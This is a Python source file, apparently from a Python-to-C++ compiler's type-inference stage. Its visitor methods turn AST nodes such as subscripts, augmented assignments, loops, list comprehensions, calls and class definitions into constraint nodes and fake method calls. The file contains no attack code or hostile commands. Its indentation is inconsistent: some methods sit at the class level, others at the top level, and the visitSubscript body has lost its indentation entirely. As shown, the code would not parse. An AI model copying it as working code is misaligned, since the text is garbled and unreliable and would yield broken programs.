        self.visit_and_or(node, func)
    def visitOr(self, node, func=None):
        # 'and' and 'or' share one implementation.
        self.visit_and_or(node, func)
    def visit_and_or(self, node, func):
        """Flow every operand of an and/or chain into the expression node
        (short-circuit operators yield one of their operands)."""
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[newnode] = set()
        for child in node.getChildNodes():
            if node in self.gx.bool_test_only:
                self.bool_test_add(child)
            self.visit(child, func)
            self.add_constraint((inode(self.gx, child), newnode), func)
            self.temp_var2(child, newnode, func)
    def visitIf(self, node, func=None):
        """Visit if/elif tests (as bool() calls) and bodies; isinstance
        tests push a type filter for the duration of their branch."""
        for test, code in node.tests:
            if is_isinstance(test):
                self.gx.filterstack.append(test.args)
            self.bool_test_add(test)
            faker = CallFunc(Name('bool'), [test])
            self.visit(faker, func)
            self.visit(code, func)
            if is_isinstance(test):
                self.gx.filterstack.pop()
        if node.else_:
            self.visit(node.else_, func)
    def visitIfExp(self, node, func=None):
        """Conditional expression: both branches flow into the result."""
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[newnode] = set()
        for child in node.getChildNodes():
            self.visit(child, func)
        self.add_constraint((inode(self.gx, node.then), newnode), func)
        self.add_constraint((inode(self.gx, node.else_), newnode), func)
    def visitGlobal(self, node, func=None):
        # record 'global' declarations on the enclosing function
        func.globals += node.names
    def visitList(self, node, func=None):
        # list literal -> list construction
        self.constructor(node, 'list', func)
    def visitDict(self, node, func=None):
        # dict literal -> dict construction
        self.constructor(node, 'dict', func)
        if node.items:  # XXX library bug
            node.lineno = node.items[0][0].lineno
    def visitNot(self, node, func=None):
        # 'not' always yields a bool, regardless of the operand type
        self.bool_test_add(node.expr)
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        newnode.copymetoo = True
        self.gx.types[newnode] = set([(def_class(self.gx, 'bool_'), 0)])  # XXX new type?
        self.visit(node.expr, func)
    def visitBackquote(self, node, func=None):
        # `expr` is repr(expr): model as a fake __repr__ call
        self.fake_func(node, node.expr, '__repr__', [], func)
    def visitTuple(self, node, func=None):
        # pairs get the specialized 'tuple2' class, everything else 'tuple'
        if len(node.nodes) == 2:
            self.constructor(node, 'tuple2', func)
        else:
            self.constructor(node, 'tuple', func)
def visitSubscript(self, node, func=None): # XXX merge __setitem__, __getitem__
if len(node.subs) > 1:
subscript = Tuple(node.subs)
else:
subscript = node.subs[0]
if isinstance(subscript, Ellipsis): # XXX also check at setitem
error('ellipsis is not supported', self.gx, node, mv=getmv())
if isinstance(subscript, Sliceobj):
self.slice(node, node.expr, subscript.nodes, func)
else:
if node.flags == 'OP_DELETE':
self.fake_func(node, node.expr, '__delitem__', [subscript], func)
elif len(node.subs) > 1:
self.fake_func(node, node.expr, '__getitem__', [subscript], func)
else:
ident = '__getitem__'
self.fake_func(node, node.expr, ident, [subscript], func)
    def visitSlice(self, node, func=None):
        # a[x:y] -> slice with no step component
        self.slice(node, node.expr, [node.lower, node.upper, None], func)
    def slice(self, node, expr, nodes, func, replace=None):
        """Model a slice read/write/delete as a fake __slice__ /
        __setslice__ / __delete__ call with bitmask-encoded components."""
        nodes2 = slice_nums(nodes)
        if replace:
            self.fake_func(node, expr, '__setslice__', nodes2 + [replace], func)
        elif node.flags == 'OP_DELETE':
            self.fake_func(node, expr, '__delete__', nodes2, func)
        else:
            self.fake_func(node, expr, '__slice__', nodes2, func)
    def visitUnarySub(self, node, func=None):
        # -x -> x.__neg__()
        self.fake_func(node, node.expr, '__neg__', [], func)
    def visitUnaryAdd(self, node, func=None):
        # +x -> x.__pos__()
        self.fake_func(node, node.expr, '__pos__', [], func)
    def visitCompare(self, node, func=None):
        """Comparison chains always yield bool; each pair of operands is
        modelled as a comparison helper or fake dunder call."""
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        newnode.copymetoo = True
        self.gx.types[newnode] = set([(def_class(self.gx, 'bool_'), 0)])  # XXX new type?
        self.visit(node.expr, func)
        msgs = {'<': 'lt', '>': 'gt', 'in': 'contains', 'not in': 'contains', '!=': 'ne', '==': 'eq', '<=': 'le', '>=': 'ge'}
        left = node.expr
        for op, right in node.ops:
            self.visit(right, func)
            msg = msgs.get(op)
            if msg == 'contains':
                # containment dispatches on the right-hand operand
                self.fake_func(node, right, '__' + msg + '__', [left], func)
            elif msg in ('lt', 'gt', 'le', 'ge'):
                # orderings go through the __lt/__gt/... helper functions
                fakefunc = CallFunc(Name('__%s' % msg), [left, right])
                fakefunc.lineno = left.lineno
                self.visit(fakefunc, func)
            elif msg:
                self.fake_func(node, left, '__' + msg + '__', [right], func)
            left = right
        # tempvars, e.g. (t1=fun())
        for term in node.ops[:-1]:
            if not isinstance(term[1], (Name, Const)):
                self.temp_var2(term[1], inode(self.gx, term[1]), func)
    def visitBitand(self, node, func=None):
        # n-ary & -> chained __(i)and__ calls
        self.visitBitpair(node, aug_msg(node, 'and'), func)
    def visitBitor(self, node, func=None):
        # n-ary | -> chained __(i)or__ calls
        self.visitBitpair(node, aug_msg(node, 'or'), func)
    def visitBitxor(self, node, func=None):
        # n-ary ^ -> chained __(i)xor__ calls
        self.visitBitpair(node, aug_msg(node, 'xor'), func)
    def visitBitpair(self, node, msg, func=None):
        """Fold an n-ary bit operation left-to-right into pairwise fake
        dunder calls, flowing each intermediate result into the node."""
        CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[inode(self.gx, node)] = set()
        left = node.nodes[0]
        for i, right in enumerate(node.nodes[1:]):
            faker = self.fake_func((left, i), left, msg, [right], func)
            left = faker
            self.add_constraint((inode(self.gx, faker), inode(self.gx, node)), func)
    def visitAdd(self, node, func=None):
        # a + b -> a.__(i)add__(b)
        self.fake_func(node, node.left, aug_msg(node, 'add'), [node.right], func)
    def visitInvert(self, node, func=None):
        # ~x -> x.__invert__()
        self.fake_func(node, node.expr, '__invert__', [], func)
    def visitRightShift(self, node, func=None):
        # a >> b -> a.__(i)rshift__(b)
        self.fake_func(node, node.left, aug_msg(node, 'rshift'), [node.right], func)
    def visitLeftShift(self, node, func=None):
        # a << b -> a.__(i)lshift__(b)
        self.fake_func(node, node.left, aug_msg(node, 'lshift'), [node.right], func)
def visitAugAssign(self, node, func=None):  # a[b] += c -> a[b] = a[b]+c, using tempvars to handle sidefx
    """Rewrite an augmented assignment into a plain assignment.

    Subscript targets get temp vars for the container and the index so the
    side effects of evaluating them happen only once; the rewritten Assign
    is stored on the node's inode as 'assignhop'.
    """
    newnode = CNode(self.gx, node, parent=func, mv=getmv())
    self.gx.types[newnode] = set()
    clone = copy.deepcopy(node)
    lnode = node.node
    if isinstance(node.node, Name):
        blah = AssName(clone.node.name, 'OP_ASSIGN')
    elif isinstance(node.node, Getattr):
        blah = AssAttr(clone.node.expr, clone.node.attrname, 'OP_ASSIGN')
    elif isinstance(node.node, Subscript):
        # t1 = container, t2 = subscript; reuse them on both sides
        t1 = self.temp_var(node.node.expr, func)
        a1 = Assign([AssName(t1.name, 'OP_ASSIGN')], node.node.expr)
        self.visit(a1, func)
        self.add_constraint((inode(self.gx, node.node.expr), inode(self.gx, t1)), func)
        if len(node.node.subs) > 1:
            subs = Tuple(node.node.subs)
        else:
            subs = node.node.subs[0]
        t2 = self.temp_var(subs, func)
        a2 = Assign([AssName(t2.name, 'OP_ASSIGN')], subs)
        # NOTE(review): a1 is visited a second time here — looks redundant
        # with the visit above; confirm this is intentional
        self.visit(a1, func)
        self.visit(a2, func)
        self.add_constraint((inode(self.gx, subs), inode(self.gx, t2)), func)
        inode(self.gx, node).temp1 = t1.name
        inode(self.gx, node).temp2 = t2.name
        inode(self.gx, node).subs = subs
        blah = Subscript(Name(t1.name), 'OP_APPLY', [Name(t2.name)])
        lnode = Subscript(Name(t1.name), 'OP_APPLY', [Name(t2.name)])
    else:
        error('unsupported type of assignment', self.gx, node, mv=getmv())
    # map the augmented operator to the equivalent binary AST node
    if node.op == '-=':
        blah2 = Sub((lnode, node.expr))
    if node.op == '+=':
        blah2 = Add((lnode, node.expr))
    if node.op == '|=':
        blah2 = Bitor((lnode, node.expr))
    if node.op == '&=':
        blah2 = Bitand((lnode, node.expr))
    if node.op == '^=':
        blah2 = Bitxor((lnode, node.expr))
    if node.op == '**=':
        blah2 = Power((lnode, node.expr))
    if node.op == '<<=':
        blah2 = LeftShift((lnode, node.expr))
    if node.op == '>>=':
        blah2 = RightShift((lnode, node.expr))
    if node.op == '%=':
        blah2 = Mod((lnode, node.expr))
    if node.op == '*=':
        blah2 = Mul((lnode, node.expr))
    if node.op == '/=':
        blah2 = Div((lnode, node.expr))
    if node.op == '//=':
        blah2 = FloorDiv((lnode, node.expr))
    blah2.augment = True
    assign = Assign([blah], blah2)
    register_node(assign, func)
    inode(self.gx, node).assignhop = assign
    self.visit(assign, func)
def visitSub(self, node, func=None):
    """Model 'left - right' as a fake __(i)sub__ call."""
    message = aug_msg(node, 'sub')
    self.fake_func(node, node.left, message, [node.right], func)
def visitMul(self, node, func=None):
    """Model 'left * right' as a fake __(i)mul__ call."""
    message = aug_msg(node, 'mul')
    self.fake_func(node, node.left, message, [node.right], func)
def visitDiv(self, node, func=None):
    """Model 'left / right' as a fake __(i)div__ call."""
    message = aug_msg(node, 'div')
    self.fake_func(node, node.left, message, [node.right], func)
def visitFloorDiv(self, node, func=None):
    """Model 'left // right' as a fake __(i)floordiv__ call."""
    message = aug_msg(node, 'floordiv')
    self.fake_func(node, node.left, message, [node.right], func)
def visitPower(self, node, func=None):
    """Model 'left ** right' as a fake __pow__ call (never augmented)."""
    arguments = [node.right]
    self.fake_func(node, node.left, '__pow__', arguments, func)
def visitMod(self, node, func=None):
    """Model '%': printf-style formatting or plain modulo.

    With a tuple/dict literal on the right-hand side, each formatted value
    of a tuple additionally gets a fake __str__ call.
    """
    if isinstance(node.right, (Tuple, Dict)):
        self.fake_func(node, node.left, '__mod__', [], func)
        for child in node.right.getChildNodes():
            self.visit(child, func)
            if isinstance(node.right, Tuple):
                self.fake_func(inode(self.gx, child), child, '__str__', [], func)
    else:
        self.fake_func(node, node.left, '__mod__', [node.right], func)
def visitPrintnl(self, node, func=None):
    """'print' with a trailing newline is handled exactly like 'print'."""
    return self.visitPrint(node, func)
def visitPrint(self, node, func=None):
    """Visit each printed expression and give it a fake __str__ call."""
    pnode = CNode(self.gx, node, parent=func, mv=getmv())
    self.gx.types[pnode] = set()
    for child in node.getChildNodes():
        self.visit(child, func)
        self.fake_func(inode(self.gx, child), child, '__str__', [], func)
def temp_var(self, node, func=None, looper=None, wopper=None, exc_name=False):
    """Create (or reuse) a temporary variable keyed on an AST node.

    Temp var names are generated sequentially ('__0', '__1', ...); a node
    that already has one (or whose parent node has one) reuses that name.
    """
    if node in self.gx.parent_nodes:
        varname = self.tempcount[self.gx.parent_nodes[node]]
    elif node in self.tempcount:  # XXX investigate why this happens
        varname = self.tempcount[node]
    else:
        varname = '__' + str(len(self.tempcount))
    var = default_var(self.gx, varname, func, mv=getmv(), exc_name=exc_name)
    var.looper = looper
    var.wopper = wopper
    self.tempcount[node] = varname
    register_temp_var(var, func)
    return var
def temp_var2(self, node, source, func):
    """Create a temp var for *node* and let *source* flow into it."""
    fresh = self.temp_var(node, func)
    self.add_constraint((source, inode(self.gx, fresh)), func)
    return fresh
def temp_var_int(self, node, func):
    """Create a temp var seeded with the builtin integer class."""
    tvar = self.temp_var(node, func)
    tvar_node = inode(self.gx, tvar)
    self.gx.types[tvar_node] = set([(def_class(self.gx, 'int_'), 0)])
    tvar_node.copymetoo = True
    return tvar
def visitRaise(self, node, func=None):
    """Accept only the single-expression 'raise expr' form, then visit it."""
    unsupported = node.expr1 is None or node.expr2 is not None or node.expr3 is not None
    if unsupported:
        error('unsupported raise syntax', self.gx, node, mv=getmv())
    for sub in node.getChildNodes():
        self.visit(sub, func)
def visitTryExcept(self, node, func=None):
    """Visit a try/except: seed each handler's variable with its class.

    Each handler is a (type-expr, target, body) triple; tuple type-exprs
    are expanded into one pair per listed exception class.
    """
    self.visit(node.body, func)
    for handler in node.handlers:
        if not handler[0]:
            continue
        if isinstance(handler[0], Tuple):
            pairs = [(n, handler[1]) for n in handler[0].nodes]
        else:
            pairs = [(handler[0], handler[1])]
        for (h0, h1) in pairs:
            if isinstance(h0, Name) and h0.name in ['int', 'float', 'str', 'class']:
                continue  # handle in lookup_class
            cl = lookup_class(h0, getmv())
            if not cl:
                error("unknown or unsupported exception type", self.gx, h0, mv=getmv())
            # 'except E, e': bind e; otherwise use an invisible temp var
            if isinstance(h1, AssName):
                var = self.default_var(h1.name, func, exc_name=True)
            else:
                var = self.temp_var(h0, func, exc_name=True)
            var.invisible = True
            inode(self.gx, var).copymetoo = True
            self.gx.types[inode(self.gx, var)] = set([(cl, 1)])
    for handler in node.handlers:
        self.visit(handler[2], func)
    # else
    if node.else_:
        self.visit(node.else_, func)
        self.temp_var_int(node.else_, func)
def visitTryFinally(self, node, func=None):
    """try/finally is rejected outright by the compiler."""
    message = "'try..finally' is not supported"
    error(message, self.gx, node, mv=getmv())
def visitYield(self, node, func):
    """Mark *func* as a generator and model the yield.

    The yield is rewritten as returning an __iter wrapper, and the yielded
    value flows into the function's dedicated yield node.
    """
    func.isGenerator = True
    func.yieldNodes.append(node)
    self.visit(Return(CallFunc(Name('__iter'), [node.value])), func)
    self.add_constraint((inode(self.gx, node.value), func.yieldnode), func)
def visitFor(self, node, func=None):
    """Build constraints for a for-loop: iterable elements -> targets.

    Iteration is modelled as node.list.__iter__().next(); the result flows
    into the assignment node, then into the loop variable(s).
    """
    # --- iterable contents -> assign node
    assnode = CNode(self.gx, node.assign, parent=func, mv=getmv())
    self.gx.types[assnode] = set()
    get_iter = CallFunc(Getattr(node.list, '__iter__'), [])
    fakefunc = CallFunc(Getattr(get_iter, 'next'), [])
    self.visit(fakefunc, func)
    self.add_constraint((inode(self.gx, fakefunc), assnode), func)
    # --- assign node -> variables XXX merge into assign_pair
    if isinstance(node.assign, AssName):
        # for x in..
        lvar = self.default_var(node.assign.name, func)
        self.add_constraint((assnode, inode(self.gx, lvar)), func)
    elif isinstance(node.assign, AssAttr):  # XXX experimental :)
        # for expr.x in..
        CNode(self.gx, node.assign, parent=func, mv=getmv())
        self.gx.assign_target[node.assign.expr] = node.assign.expr  # XXX multiple targets possible please
        fakefunc2 = CallFunc(Getattr(node.assign.expr, '__setattr__'), [Const(node.assign.attrname), fakefunc])
        self.visit(fakefunc2, func)
    elif isinstance(node.assign, (AssTuple, AssList)):
        # for (a,b, ..) in..
        self.tuple_flow(node.assign, node.assign, func)
    else:
        error('unsupported type of assignment', self.gx, node, mv=getmv())
    self.do_for(node, assnode, get_iter, func)
    # --- for-else
    if node.else_:
        self.temp_var_int(node.else_, func)
        self.visit(node.else_, func)
    # --- loop body
    self.gx.loopstack.append(node)
    self.visit(node.body, func)
    self.gx.loopstack.pop()
    self.for_in_iters.append(node.list)
def do_for(self, node, assnode, get_iter, func):
    """Allocate the temp vars a for-loop needs at code-generation time.

    Fast 'for i in range(..)' loops get temps for the bounds; general
    loops get temps for the iterable, the iterator and (for enumerate/zip)
    extra bookkeeping slots keyed as (node, 1..7).
    """
    # --- for i in range(..) XXX i should not be modified.. use tempcounter; two bounds
    if is_fastfor(node):
        self.temp_var2(node.assign, assnode, func)
        self.temp_var2(node.list, inode(self.gx, node.list.args[0]), func)
        if len(node.list.args) == 3 and not isinstance(node.list.args[2], Name) and not is_literal(node.list.args[2]):  # XXX merge with ListComp
            for arg in node.list.args:
                if not isinstance(arg, Name) and not is_literal(arg):  # XXX create func for better check
                    self.temp_var2(arg, inode(self.gx, arg), func)
    # --- temp vars for list, iter etc.
    else:
        self.temp_var2(node, inode(self.gx, node.list), func)
        self.temp_var2((node, 1), inode(self.gx, get_iter), func)
        self.temp_var_int(node.list, func)
        if is_enum(node) or is_zip2(node):
            self.temp_var2((node, 2), inode(self.gx, node.list.args[0]), func)
            if is_zip2(node):
                self.temp_var2((node, 3), inode(self.gx, node.list.args[1]), func)
                self.temp_var_int((node, 4), func)
            self.temp_var((node, 5), func, looper=node.list)
        if isinstance(node.list, CallFunc) and isinstance(node.list.node, Getattr):
            self.temp_var((node, 6), func, wopper=node.list.node.expr)
            self.temp_var2((node, 7), inode(self.gx, node.list.node.expr), func)
def bool_test_add(self, node):
    """Remember boolean operators that are used purely as truth tests."""
    boolean_ops = (And, Or, Not)
    if isinstance(node, boolean_ops):
        self.gx.bool_test_only.add(node)
def visitWhile(self, node, func=None):
    """Visit a while-loop; loopstack tracks the innermost enclosing loop."""
    self.gx.loopstack.append(node)
    self.bool_test_add(node.test)
    for child in node.getChildNodes():
        self.visit(child, func)
    self.gx.loopstack.pop()
    if node.else_:
        self.temp_var_int(node.else_, func)
        self.visit(node.else_, func)
def visitWith(self, node, func=None):
    """Visit a with-statement; flow the context expression into the 'as' var."""
    if node.vars:
        varnode = CNode(self.gx, node.vars, parent=func, mv=getmv())
        self.gx.types[varnode] = set()
        self.visit(node.expr, func)
        self.add_constraint((inode(self.gx, node.expr), varnode), func)
        lvar = self.default_var(node.vars.name, func)
        self.add_constraint((varnode, inode(self.gx, lvar)), func)
    else:
        self.visit(node.expr, func)
    for child in node.getChildNodes():
        self.visit(child, func)
def visitListCompIf(self, node, func=None):
    """Visit the condition of a list-comprehension 'if' clause."""
    self.bool_test_add(node.test)
    for sub in node.getChildNodes():
        self.visit(sub, func)
def visitListComp(self, node, func=None):
    """Model a list comprehension as an implicit local function.

    Each qualifier is wired like a for-loop inside the synthetic function;
    the expression's type flows into the resulting list's element type.
    """
    # --- [expr for iter in list for .. if cond ..]
    lcfunc = Function(self.gx, mv=getmv())
    lcfunc.listcomp = True
    lcfunc.ident = 'l.c.'  # XXX
    lcfunc.parent = func
    for qual in node.quals:
        # iter
        assnode = CNode(self.gx, qual.assign, parent=func, mv=getmv())
        self.gx.types[assnode] = set()
        # list.unit->iter
        get_iter = CallFunc(Getattr(qual.list, '__iter__'), [])
        fakefunc = CallFunc(Getattr(get_iter, 'next'), [])
        self.visit(fakefunc, lcfunc)
        self.add_constraint((inode(self.gx, fakefunc), inode(self.gx, qual.assign)), lcfunc)
        if isinstance(qual.assign, AssName):  # XXX merge with visitFor
            lvar = default_var(self.gx, qual.assign.name, lcfunc)  # XXX str or Name?
            self.add_constraint((inode(self.gx, qual.assign), inode(self.gx, lvar)), lcfunc)
        else:  # AssTuple, AssList
            self.tuple_flow(qual.assign, qual.assign, lcfunc)
        self.do_for(qual, assnode, get_iter, lcfunc)
        # cond
        for child in qual.ifs:
            self.visit(child, lcfunc)
        self.for_in_iters.append(qual.list)
    # node type
    if node in self.gx.genexp_to_lc.values():  # converted generator expression
        self.instance(node, def_class(self.gx, '__iter'), func)
    else:
        self.instance(node, def_class(self.gx, 'list'), func)
    # expr->instance.unit
    self.visit(node.expr, lcfunc)
    self.add_dynamic_constraint(node, node.expr, 'unit', lcfunc)
    lcfunc.ident = 'list_comp_' + str(len(self.listcomps))
    self.listcomps.append((node, lcfunc, func))
def visitReturn(self, node, func):
    """Flow a returned expression into the function's return node.

    'return None' gets no CNode of its own; named return values are also
    recorded in func.retvars.
    """
    self.visit(node.value, func)
    func.returnexpr.append(node.value)
    if not (isinstance(node.value, Const) and node.value.value is None):
        newnode = CNode(self.gx, node, parent=func, mv=getmv())
        self.gx.types[newnode] = set()
    if isinstance(node.value, Name):
        func.retvars.append(node.value.name)
    if func.retnode:
        self.add_constraint((inode(self.gx, node.value), func.retnode), func)
def visitAssign(self, node, func=None):
    """Build constraints for (possibly chained / unpacking) assignments.

    struct.unpack targets are rewritten specially; otherwise each
    (lvalue, rvalue) pair is dispatched on the lvalue's kind.
    """
    # --- rewrite for struct.unpack XXX rewrite callfunc as tuple
    if len(node.nodes) == 1:
        lvalue, rvalue = node.nodes[0], node.expr
        if self.struct_unpack(rvalue, func) and isinstance(lvalue, (AssList, AssTuple)) and not [n for n in lvalue.nodes if isinstance(n, (AssList, AssTuple))]:
            self.visit(node.expr, func)
            sinfo = self.struct_info(rvalue.args[0], func)
            faketuple = self.struct_faketuple(sinfo)
            self.visit(Assign(node.nodes, faketuple), func)
            tvar = self.temp_var2(rvalue.args[1], inode(self.gx, rvalue.args[1]), func)
            tvar_pos = self.temp_var_int(rvalue.args[0], func)
            self.gx.struct_unpack[node] = (sinfo, tvar.name, tvar_pos.name)
            return
    newnode = CNode(self.gx, node, parent=func, mv=getmv())
    self.gx.types[newnode] = set()
    # --- a,b,.. = c,(d,e),.. = .. = expr
    for target_expr in node.nodes:
        pairs = assign_rec(target_expr, node.expr)
        for (lvalue, rvalue) in pairs:
            # expr[expr] = expr
            if isinstance(lvalue, Subscript) and not isinstance(lvalue.subs[0], Sliceobj):
                self.assign_pair(lvalue, rvalue, func)  # XXX use here generally, and in tuple_flow
            # expr.attr = expr
            elif isinstance(lvalue, AssAttr):
                self.assign_pair(lvalue, rvalue, func)
            # name = expr
            elif isinstance(lvalue, AssName):
                if (rvalue, 0, 0) not in self.gx.cnode:  # XXX generalize
                    self.visit(rvalue, func)
                self.visit(lvalue, func)
                lvar = self.default_var(lvalue.name, func)
                if isinstance(rvalue, Const):
                    lvar.const_assign.append(rvalue)
                self.add_constraint((inode(self.gx, rvalue), inode(self.gx, lvar)), func)
            # (a,(b,c), ..) = expr
            elif isinstance(lvalue, (AssTuple, AssList)):
                self.visit(rvalue, func)
                self.tuple_flow(lvalue, rvalue, func)
            # expr[a:b] = expr # XXX bla()[1:3] = [1]
            elif isinstance(lvalue, Slice):
                self.slice(lvalue, lvalue.expr, [lvalue.lower, lvalue.upper, None], func, rvalue)
            # expr[a:b:c] = expr
            elif isinstance(lvalue, Subscript) and isinstance(lvalue.subs[0], Sliceobj):
                self.slice(lvalue, lvalue.expr, lvalue.subs[0].nodes, func, rvalue)
    # temp vars
    if len(node.nodes) > 1 or isinstance(node.expr, Tuple):
        if isinstance(node.expr, Tuple):
            if [n for n in node.nodes if isinstance(n, AssTuple)]:
                for child in node.expr.nodes:
                    if (child, 0, 0) not in self.gx.cnode:  # (a,b) = (1,2): (1,2) never visited
                        continue
                    if not isinstance(child, Const) and not (isinstance(child, Name) and child.name == 'None'):
                        self.temp_var2(child, inode(self.gx, child), func)
        elif not isinstance(node.expr, Const) and not (isinstance(node.expr, Name) and node.expr.name == 'None'):
            self.temp_var2(node.expr, inode(self.gx, node.expr), func)
def assign_pair(self, lvalue, rvalue, func):
    """Model one 'lvalue = rvalue' via fake __setitem__/__setattr__ calls."""
    # expr[expr] = expr
    if isinstance(lvalue, Subscript) and not isinstance(lvalue.subs[0], Sliceobj):
        if len(lvalue.subs) > 1:
            subscript = Tuple(lvalue.subs)
        else:
            subscript = lvalue.subs[0]
        fakefunc = CallFunc(Getattr(lvalue.expr, '__setitem__'), [subscript, rvalue])
        self.visit(fakefunc, func)
        inode(self.gx, lvalue.expr).fakefunc = fakefunc
        if len(lvalue.subs) > 1:
            inode(self.gx, lvalue.expr).faketuple = subscript
        if not isinstance(lvalue.expr, Name):
            self.temp_var2(lvalue.expr, inode(self.gx, lvalue.expr), func)
    # expr.attr = expr
    elif isinstance(lvalue, AssAttr):
        CNode(self.gx, lvalue, parent=func, mv=getmv())
        self.gx.assign_target[rvalue] = lvalue.expr
        fakefunc = CallFunc(Getattr(lvalue.expr, '__setattr__'), [Const(lvalue.attrname), rvalue])
        self.visit(fakefunc, func)
def default_var(self, name, func, exc_name=False):
    """Look up or create a variable, honouring 'global' declarations."""
    scope = func
    if isinstance(func, Function) and name in func.globals:
        # declared global inside the function: bind at module level
        scope = None
    return default_var(self.gx, name, scope, mv=getmv(), exc_name=exc_name)
def tuple_flow(self, lvalue, rvalue, func=None):
    """Flow tuple/list unpacking: rvalue[i] into each target item."""
    self.temp_var2(lvalue, inode(self.gx, rvalue), func)
    if isinstance(lvalue, (AssTuple, AssList)):
        lvalue = lvalue.nodes
    for (i, item) in enumerate(lvalue):
        fakenode = CNode(self.gx, (item,), parent=func, mv=getmv())  # fake node per item, for multiple callfunc triggers
        self.gx.types[fakenode] = set()
        self.add_constraint((inode(self.gx, rvalue), fakenode), func)
        # each item is fed by a fake rvalue.__getitem__(i) call
        fakefunc = CallFunc(FakeGetattr3(rvalue, '__getitem__'), [Const(i)])
        fakenode.callfuncs.append(fakefunc)
        self.visit(fakefunc, func)
        self.gx.item_rvalue[item] = rvalue
        if isinstance(item, AssName):
            lvar = self.default_var(item.name, func)
            self.add_constraint((inode(self.gx, fakefunc), inode(self.gx, lvar)), func)
        elif isinstance(item, (Subscript, AssAttr)):
            self.assign_pair(item, fakefunc, func)
        elif isinstance(item, (AssTuple, AssList)):  # recursion
            self.tuple_flow(item, fakefunc, func)
        else:
            error('unsupported type of assignment', self.gx, item, mv=getmv())
def super_call(self, orig, parent):
    """For a super(Class, self).meth() call, return Class's first base.

    Only the two-argument form with literal 'self' is supported; any other
    use of super() is rejected.
    """
    node = orig.node
    while isinstance(parent, Function):
        parent = parent.parent
    if (isinstance(node.expr, CallFunc) and
        node.attrname not in ('__getattr__', '__setattr__') and
            isinstance(node.expr.node, Name) and
            node.expr.node.name == 'super'):
        if (len(node.expr.args) >= 2 and
                isinstance(node.expr.args[1], Name) and node.expr.args[1].name == 'self'):
            cl = lookup_class(node.expr.args[0], getmv())
            if cl.node.bases:
                return cl.node.bases[0]
        error("unsupported usage of 'super'", self.gx, orig, mv=getmv())
def visitCallFunc(self, node, func=None):  # XXX clean up!!
    """Build constraints for a call: method call, direct call or instantiation.

    super(..) calls are rewritten first; unsupported builtins (hasattr,
    getattr, ...) are rejected; calls to a known class become instances.
    """
    newnode = CNode(self.gx, node, parent=func, mv=getmv())
    if isinstance(node.node, Getattr):  # XXX import math; math.e
        # rewrite super(..) call
        base = self.super_call(node, func)
        if base:
            node.node = Getattr(copy.deepcopy(base), node.node.attrname)
            node.args = [Name('self')] + node.args
        # method call
        if isinstance(node.node, FakeGetattr):  # XXX butt ugly
            self.visit(node.node, func)
        elif isinstance(node.node, FakeGetattr2):
            self.gx.types[newnode] = set()  # XXX move above
            self.callfuncs.append((node, func))
            for arg in node.args:
                inode(self.gx, arg).callfuncs.append(node)  # this one too
            return
        elif isinstance(node.node, FakeGetattr3):
            pass
        else:
            self.visitGetattr(node.node, func, callfunc=True)
            inode(self.gx, node.node).callfuncs.append(node)  # XXX iterative dataflow analysis: move there?
            inode(self.gx, node.node).fakert = True
        ident = node.node.attrname
        inode(self.gx, node.node.expr).callfuncs.append(node)  # XXX iterative dataflow analysis: move there?
        # module.__getattr__('name'): connect to that module's global
        if isinstance(node.node.expr, Name) and node.node.expr.name in getmv().imports and node.node.attrname == '__getattr__':  # XXX analyze_callfunc
            if node.args[0].value in getmv().imports[node.node.expr.name].mv.globals:  # XXX bleh
                self.add_constraint((inode(self.gx, getmv().imports[node.node.expr.name].mv.globals[node.args[0].value]), newnode), func)
    elif isinstance(node.node, Name):
        # direct call
        ident = node.node.name
        if ident == 'print':
            ident = node.node.name = '__print'  # XXX
        if ident in ['hasattr', 'getattr', 'setattr', 'slice', 'type', 'Ellipsis']:
            error("'%s' function is not supported" % ident, self.gx, node.node, mv=getmv())
        if ident == 'dict' and [x for x in node.args if isinstance(x, Keyword)]:
            error('unsupported method of initializing dictionaries', self.gx, node, mv=getmv())
        if ident == 'isinstance':
            error("'isinstance' is not supported; always returns True", self.gx, node, mv=getmv(), warning=True)
        if lookup_var(ident, func, mv=getmv()):
            self.visit(node.node, func)
            inode(self.gx, node.node).callfuncs.append(node)  # XXX iterative dataflow analysis: move there
    else:
        self.visit(node.node, func)
        inode(self.gx, node.node).callfuncs.append(node)  # XXX iterative dataflow analysis: move there
    # --- arguments
    if not getmv().module.builtin and (node.star_args or node.dstar_args):
        error('argument (un)packing is not supported', self.gx, node, mv=getmv())
    args = node.args[:]
    if node.star_args:
        args.append(node.star_args)  # partially allowed in builtins
    if node.dstar_args:
        args.append(node.dstar_args)
    for arg in args:
        if isinstance(arg, Keyword):
            arg = arg.expr
        self.visit(arg, func)
        inode(self.gx, arg).callfuncs.append(node)  # this one too
    # --- handle instantiation or call
    constructor = lookup_class(node.node, getmv())
    if constructor and (not isinstance(node.node, Name) or not lookup_var(node.node.name, func, mv=getmv())):
        self.instance(node, constructor, func)
        inode(self.gx, node).callfuncs.append(node)  # XXX see above, investigate
    else:
        self.gx.types[newnode] = set()
        self.callfuncs.append((node, func))
def visitClass(self, node, parent=None):
    """Register a class definition and synthesize its implicit methods.

    Validates bases, registers the class (or reuses a forward reference),
    adds fake __setattr__/__getattr__, records staticmethod/property
    declarations, visits the class body, and generates default __iadd__
    etc., __str__ and __hash__ where missing.
    """
    if not getmv().module.builtin and not node in getmv().classnodes:
        error("non-global class '%s'" % node.name, self.gx, node, mv=getmv())
    if len(node.bases) > 1:
        error('multiple inheritance is not supported', self.gx, node, mv=getmv())
    if not getmv().module.builtin:
        # validate base classes for user code
        for base in node.bases:
            if not isinstance(base, (Name, Getattr)):
                error("invalid expression for base class", self.gx, node, mv=getmv())
            if isinstance(base, Name):
                name = base.name
            else:
                name = base.attrname
            cl = lookup_class(base, getmv())
            if not cl:
                error("no such class: '%s'" % name, self.gx, node, mv=getmv())
            elif cl.mv.module.builtin and name not in ['object', 'Exception', 'tzinfo']:
                if def_class(self.gx, 'Exception') not in cl.ancestors():
                    error("inheritance from builtin class '%s' is not supported" % name, self.gx, node, mv=getmv())
    if node.name in getmv().classes:
        newclass = getmv().classes[node.name]  # set in visitModule, for forward references
    else:
        check_redef(self.gx, node)  # XXX merge with visitModule
        newclass = Class(self.gx, node, getmv())
        self.classes[node.name] = newclass
        getmv().classes[node.name] = newclass
        newclass.module = self.module
        newclass.parent = StaticClass(newclass, getmv())
    # --- built-in functions
